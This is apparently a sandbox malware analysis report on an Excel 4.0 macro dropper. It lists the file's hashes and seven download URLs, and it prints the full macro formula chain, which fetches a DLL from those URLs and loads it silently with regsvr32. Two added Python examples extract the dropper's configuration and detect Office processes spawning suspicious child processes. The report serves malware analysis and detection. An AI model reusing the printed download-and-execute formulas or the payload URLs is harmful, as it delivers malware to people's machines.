General

  • Target

    5df125e34d80cb2d69bf1decda461cb7b8663c4a739050ca3a1a0a8b06c0a2d1

  • Size

    20KB

  • Sample

    241120-gbl4sssgrj

  • MD5

    ec54c5a515df08c95080df4bd69b8b47

  • SHA1

    f6895f5c64dff0303e27fdebfcc93b6f18ae68aa

  • SHA256

    5df125e34d80cb2d69bf1decda461cb7b8663c4a739050ca3a1a0a8b06c0a2d1

  • SHA512

    c4d29545642e952f012e0d17747ac95e961bed0ecccf58637222c9059ea760ebb6a4d43d3837265572cb3ad33b4445bf28f662e5c9606c4b0579643845eb3dcc

  • SSDEEP

    384:0HTyVb1GNjyo4CGzPd6ZIwGdKb5CzgObff9kC+xbX7zUSA:guIN+o4FLYCBn9kC+xbLzK

Score
10/10

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://osmani.atwebpages.com/wp-content/Ynwrr/

https://50-50aravidis.gr/thesi/wmL/

https://amplamaisbeneficios.com.br/contratos/MWnnZG/

http://bcingenieria.es/phpmailer/Z7fmcI7Va/

http://bredabeeld.nl/OLD/eavGp2KOdwXT/

http://www.cagataygunes.com.tr/stylesheets/uqK4kfhG4RAuRIA2/

http://kogelvanger.nl/picture_library/1MNqKan2FhWtQg5Uacu/

Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://osmani.atwebpages.com/wp-content/Ynwrr/","..\kytk.dll",0,0)
    =IF('SCWVCV'!D14<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://50-50aravidis.gr/thesi/wmL/","..\kytk.dll",0,0))
    =IF('SCWVCV'!D16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://amplamaisbeneficios.com.br/contratos/MWnnZG/","..\kytk.dll",0,0))
    =IF('SCWVCV'!D18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://bcingenieria.es/phpmailer/Z7fmcI7Va/","..\kytk.dll",0,0))
    =IF('SCWVCV'!D20<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://bredabeeld.nl/OLD/eavGp2KOdwXT/","..\kytk.dll",0,0))
    =IF('SCWVCV'!D22<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.cagataygunes.com.tr/stylesheets/uqK4kfhG4RAuRIA2/","..\kytk.dll",0,0))
    =IF('SCWVCV'!D24<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://kogelvanger.nl/picture_library/1MNqKan2FhWtQg5Uacu/","..\kytk.dll",0,0))
    =IF('SCWVCV'!D26<0,CLOSE(0),)
    =EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\kytk.dll")
    =RETURN()

    The chain works through the seven URLs in order. The first download is unconditional; each later IF fires only when the cell holding the previous CALL's return value (column D of sheet SCWVCV) is negative, i.e. URLDownloadToFileA returned a failure HRESULT. If the last download also fails the workbook simply closes and nothing is executed. Otherwise the payload written to ..\kytk.dll (a path relative to Excel's current working directory) is loaded with regsvr32.exe, the -s switch suppressing the registration dialog so the user sees nothing.
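The formula chain above is the dropper's entire configuration, so a static extractor that recovers the download URLs, the drop path, the guard cells and the final command is a useful companion to this report. The following Python is an added example, not the sandbox's own extractor; it embeds a constructed subset of the page's formulas (the first three downloads plus the CLOSE/EXEC/RETURN tail) as its sample input, and its regular expressions are written for exactly this CALL/IF/EXEC shape.

```python
"""Static config extraction for an Excel 4.0 (XLM) dropper macro chain."""
from __future__ import annotations

import re
from dataclasses import dataclass, field

# Constructed sample input: a subset of the formulas from this report
# (first three downloads plus the CLOSE/EXEC/RETURN tail), one per line,
# exactly as the sandbox dumped them.
FORMULAS = r'''
=CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://osmani.atwebpages.com/wp-content/Ynwrr/","..\kytk.dll",0,0)
=IF('SCWVCV'!D14<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://50-50aravidis.gr/thesi/wmL/","..\kytk.dll",0,0))
=IF('SCWVCV'!D16<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://amplamaisbeneficios.com.br/contratos/MWnnZG/","..\kytk.dll",0,0))
=IF('SCWVCV'!D26<0,CLOSE(0),)
=EXEC("C:\Windows\SysWow64\regsvr32.exe -s ..\kytk.dll")
=RETURN()
'''

# CALL("urlmon","URLDownloadToFileA",<sig>,0,<url>,<path>,0,0)
URLDL_RE = re.compile(
    r'CALL\("urlmon","URLDownloadToFileA","[A-Z]+",\d+,"(?P<url>[^"]+)","(?P<path>[^"]+)",\d+,\d+\)'
)
# IF('Sheet'!D14<0, ...): the guard cell whose negative value (a failed HRESULT) enables the branch
GUARD_RE = re.compile(r"IF\('?(?P<sheet>[^'!]+)'?!(?P<cell>[A-Z]+\d+)<0,")
EXEC_RE = re.compile(r'EXEC\("(?P<cmd>[^"]+)"\)')
CLOSE_RE = re.compile(r"\bCLOSE\(")


@dataclass
class DropperConfig:
    urls: list[str] = field(default_factory=list)
    drop_path: str | None = None
    exec_cmd: str | None = None
    guards: list[str] = field(default_factory=list)
    closes_on_failure: bool = False


def split_formulas(blob: str) -> list[str]:
    """Every formula starts with '='; the sandbox joined them with whitespace."""
    return [f for f in re.split(r"\s+(?==)", blob.strip()) if f]


def extract(blob: str) -> DropperConfig:
    """Walk the formulas in sheet order and collect the dropper's IOCs."""
    cfg = DropperConfig()
    for formula in split_formulas(blob):
        if (g := GUARD_RE.search(formula)):
            cfg.guards.append(f"{g['sheet']}!{g['cell']}")
        if (m := URLDL_RE.search(formula)):
            cfg.urls.append(m["url"])
            cfg.drop_path = m["path"]          # same path for every fallback URL
        if (m := EXEC_RE.search(formula)):
            cfg.exec_cmd = m["cmd"]
        if CLOSE_RE.search(formula):
            cfg.closes_on_failure = True
    return cfg


def summarize(cfg: DropperConfig) -> list[str]:
    """Turn the raw config into the points an analyst would put in a report."""
    findings = [
        f"{len(cfg.urls)} download URL(s), fallback guarded by {len(cfg.guards)} cell check(s)"
    ]
    if cfg.drop_path and not re.match(r"^[A-Za-z]:\\", cfg.drop_path):
        findings.append(f"payload written to relative path {cfg.drop_path}")
    if cfg.exec_cmd and "regsvr32" in cfg.exec_cmd.lower() and re.search(r"\s[-/]s\b", cfg.exec_cmd):
        findings.append("dropped DLL registered silently via regsvr32 -s")
    if cfg.closes_on_failure:
        findings.append("workbook closes if every download fails (no execution without payload)")
    return findings


if __name__ == "__main__":
    config = extract(FORMULAS)
    for url in config.urls:
        print("url:", url)
    print("drop path:", config.drop_path)
    print("exec:", config.exec_cmd)
    for line in summarize(config):
        print("-", line)
```

The guard cells are worth keeping: they tell you where in the sheet the CALL results land, which is what you need when you want to confirm the fallback logic in an emulator rather than trust the regex.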

Extracted

  Language   Source          URLs
  xlm4.0     xlm40.dropper   http://osmani.atwebpages.com/wp-content/Ynwrr/
  xlm4.0     xlm40.dropper   https://50-50aravidis.gr/thesi/wmL/
  xlm4.0     xlm40.dropper   https://amplamaisbeneficios.com.br/contratos/MWnnZG/

Targets

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro. Here the macro's EXEC formula makes Excel launch C:\Windows\SysWow64\regsvr32.exe -s ..\kytk.dll to register the DLL fetched by URLDownloadToFileA, so the Office parent spawning regsvr32.exe is the behaviour that triggers this signature.
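The signature fires on the parent/child relationship, not on the file hash, which is why it survives a recompiled payload. The following Python is an added example of that detection over constructed process-creation events; it is not Triage's own signature logic. It flags an Office parent spawning a script or registration host, raises severity when regsvr32 is run silently against a DLL outside the Windows directory (the pattern on this page), and lets the known benign Excel helper splwow64.exe through. The event field names and the allow/deny lists are assumptions.

```python
"""Detect Office processes spawning unexpected children (constructed events)."""
from __future__ import annotations

import ntpath
from dataclasses import dataclass

OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
# Living-off-the-land hosts an Office macro has no business launching (assumed list).
SUSPICIOUS_CHILDREN = {
    "regsvr32.exe", "rundll32.exe", "mshta.exe", "wscript.exe",
    "cscript.exe", "powershell.exe", "cmd.exe", "certutil.exe",
}
# Helpers Office launches legitimately, e.g. the 32/64-bit print spooler thunk (assumed allowlist).
BENIGN_CHILDREN = {"splwow64.exe"}

# Constructed sample events in a Sysmon-like shape; the first mirrors this report's EXEC call.
EVENTS = [
    {"parent_image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "image": r"C:\Windows\SysWOW64\regsvr32.exe",
     "command_line": r"C:\Windows\SysWow64\regsvr32.exe -s ..\kytk.dll"},
    {"parent_image": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "image": r"C:\Windows\splwow64.exe",
     "command_line": r"C:\Windows\splwow64.exe 8192"},
    {"parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\regsvr32.exe",
     "command_line": r"regsvr32.exe /s C:\Windows\System32\msxml3.dll"},
    {"parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\regsvr32.exe",
     "command_line": r"regsvr32.exe /s C:\Windows\System32\msxml3.dll"},
]


@dataclass
class Finding:
    parent: str
    child: str
    command_line: str
    severity: str
    reason: str


def _basename(path: str) -> str:
    # ntpath handles backslash paths regardless of the host OS the detector runs on.
    return ntpath.basename(path).lower()


def _regsvr32_is_silent_external(cmd: str) -> bool:
    """regsvr32 with the silent switch loading a DLL that is not under C:\\Windows."""
    args = cmd.split()
    silent = any(a.lower() in ("-s", "/s") for a in args)
    dlls = [a for a in args if a.lower().endswith(".dll")]
    outside = any(not a.lower().startswith("c:\\windows\\") for a in dlls)
    return silent and outside


def evaluate(event: dict) -> Finding | None:
    """Return a Finding for an Office parent with an unexpected child, else None."""
    parent = _basename(event["parent_image"])
    child = _basename(event["image"])
    if parent not in OFFICE_PARENTS or child in BENIGN_CHILDREN:
        return None
    cmd = event["command_line"]
    if child not in SUSPICIOUS_CHILDREN:
        return Finding(parent, child, cmd, "medium", "office parent spawned unusual child")
    if child == "regsvr32.exe" and _regsvr32_is_silent_external(cmd):
        return Finding(parent, child, cmd, "high", "silent regsvr32 load of DLL outside %SystemRoot%")
    return Finding(parent, child, cmd, "high", "office parent spawned LOLBin")


def scan(events: list[dict]) -> list[Finding]:
    return [f for f in (evaluate(e) for e in events) if f is not None]


if __name__ == "__main__":
    for finding in scan(EVENTS):
        print(f"[{finding.severity}] {finding.parent} -> {finding.child}: {finding.reason}")
        print("    ", finding.command_line)
```

Note that the explorer.exe event with the same regsvr32 command line is deliberately not flagged: the parent is what carries the signal here, and a rule keyed only on regsvr32 /s would drown in legitimate installer noise.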
